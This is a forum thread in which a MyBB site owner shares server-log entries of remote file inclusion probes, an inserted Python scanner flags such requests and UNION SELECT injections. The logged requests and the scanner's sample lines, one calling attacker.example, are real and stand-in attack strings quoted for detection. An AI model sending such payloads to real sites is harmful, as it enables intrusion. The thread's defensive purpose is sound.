MyBB Community Forums

Full Version: Suspicious activity
Advice from my host about what to look for to detect hacking or other suspicious activity:

Generally, you need to look for requests which target a PHP file on your website and end with:

=http://externalURL

This is a common method for exploiting vulnerable scripts by including external malicious content.

Other log entries which may indicate hacking attempts include:

"UNION SELECT"

which is used for SQL injections, targeting your database data (usually trying to find the password for the administrator user).


Well guess what I saw in visitor's log today:

86.122.170.50
//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:07 Http Version: HTTP/1.1 Size in Bytes: 5889
Referer: -
Agent: Mozilla/5.0

/forum//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:08 Http Version: HTTP/1.1 Size in Bytes: 68074
Referer: -
Agent: Mozilla/5.0

/forum/index.php//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:08 Http Version: HTTP/1.1 Size in Bytes: 68074
Referer: -
Agent: Mozilla/5.0

Anybody else seen stuff like this or recognize it?
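Added example (not from this thread or from MyBB): a small Python scanner that applies the host's two rules to visitor-log entries in the layout quoted above. The sample log, the client IP and the attacker.example URL are constructed; the scanner flags a .php request carrying a parameter whose value is a remote URL, and a decoded query string containing UNION SELECT.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample in the layout of the entries quoted in the thread (IP line, request line, metadata lines).
SAMPLE_LOG = """\
198.51.100.7
//index.php?&news_act=read&news_id=http://attacker.example/probe.txt???
Http Code: 200 Date: May 04 14:07:07 Http Version: HTTP/1.1 Size in Bytes: 5889
Referer: -
Agent: Mozilla/5.0

/forum/member.php?uid=1%20UNION%20SELECT%201,2
Http Code: 200 Date: May 04 14:09:11 Http Version: HTTP/1.1 Size in Bytes: 1024
Referer: -
Agent: Mozilla/5.0

/forum/index.php?news_id=42
Http Code: 200 Date: May 04 14:10:00 Http Version: HTTP/1.1 Size in Bytes: 68074
Referer: -
Agent: Mozilla/5.0
"""

HTTP_CODE_RE = re.compile(r"^Http Code: (\d+)")
REMOTE_URL_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
UNION_SELECT_RE = re.compile(r"\bunion\b\s+(?:all\s+)?\bselect\b", re.I)

def classify(request):
    """Return the indicator names that match one request line."""
    path, _, query = request.partition("?")
    # parse_qsl URL-decodes names and values, so %20 and + are already spaces.
    params = parse_qsl(query, keep_blank_values=True)
    found = []
    # Rule 1: a PHP script handed a parameter whose value is a remote URL.
    if path.lower().endswith(".php") and any(REMOTE_URL_RE.match(v) for _, v in params):
        found.append("remote_file_include")
    # Rule 2: UNION SELECT anywhere in the decoded query string.
    if UNION_SELECT_RE.search(" ".join(f"{k}={v}" for k, v in params)):
        found.append("sql_injection")
    return found

def scan(log_text):
    """Split the log into entries and report those that match an indicator."""
    hits = []
    for block in re.split(r"\n\s*\n", log_text.strip()):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        request = next((ln for ln in lines if ln.startswith("/")), None)
        code = next((m.group(1) for ln in lines if (m := HTTP_CODE_RE.match(ln))), None)
        if request and (indicators := classify(request)):
            hits.append({"request": request, "code": code, "indicators": indicators})
    return hits
```

The HTTP code is kept in each hit because a 200 on a flagged request means the targeted script actually ran and deserves a closer look, while a 404 means the probed path did not exist.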
http://www.google.com/search?q=http%3A%2...=firefox-a


Is the visitor log in your acp at the host or at your acp on your board?
The actual PHP code for that text file is this; don't ask me what it is doing, I have no clue with PHP.

PHP code removed >> Tomm M
Someone is testing your site/server security.
It's a backdoor virus....
(2009-05-05, 12:38 AM) Pow-Mia Wrote:
http://www.google.com/search?q=http%3A%2...=firefox-a
Is the visitor log in your acp at the host or at your acp on your board?

This is on cPanel at the host site.
Hmm... interesting. So far 14 attempts, and that's just going back to April 24. Some of them have "Walkers game ear" in the lines?

Here's an interesting one:

/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://garnet
Http Code: 404 Date: Apr 30 09:14:56 Http Version: HTTP/1.1 Size in Bytes: 2489
Referer: -
Agent: Mozilla/5.0

/forum/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://
Http Code: 404 Date: Apr 30 09:15:01 Http Version: HTTP/1.1 Size in Bytes: 2489
Referer: -
Agent: Mozilla/5.0
Try and block the IP address that the people/person are from.
It's a pretty standard remote file injection script - basically testing how good the security of your script/server/site is.

Best to contact your host with this, and provide as much detail as you can - they will be able to deal with the person responsible a lot more than your IP blocking capabilities...
Tomm, can you just block the IP addresses from the people?
IP Blocking is usually a waste of time. Most legit attempts from hackers use proxies. IP banning is 95% ineffective.